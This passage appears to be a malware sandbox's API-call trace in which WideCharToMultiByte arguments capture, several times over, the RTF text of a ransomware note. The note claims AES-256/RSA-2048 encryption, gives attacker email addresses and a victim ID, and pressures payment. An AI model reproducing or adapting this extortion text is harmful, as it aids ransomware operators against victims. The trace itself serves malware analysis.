us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0070.818] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x1e971a8, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t 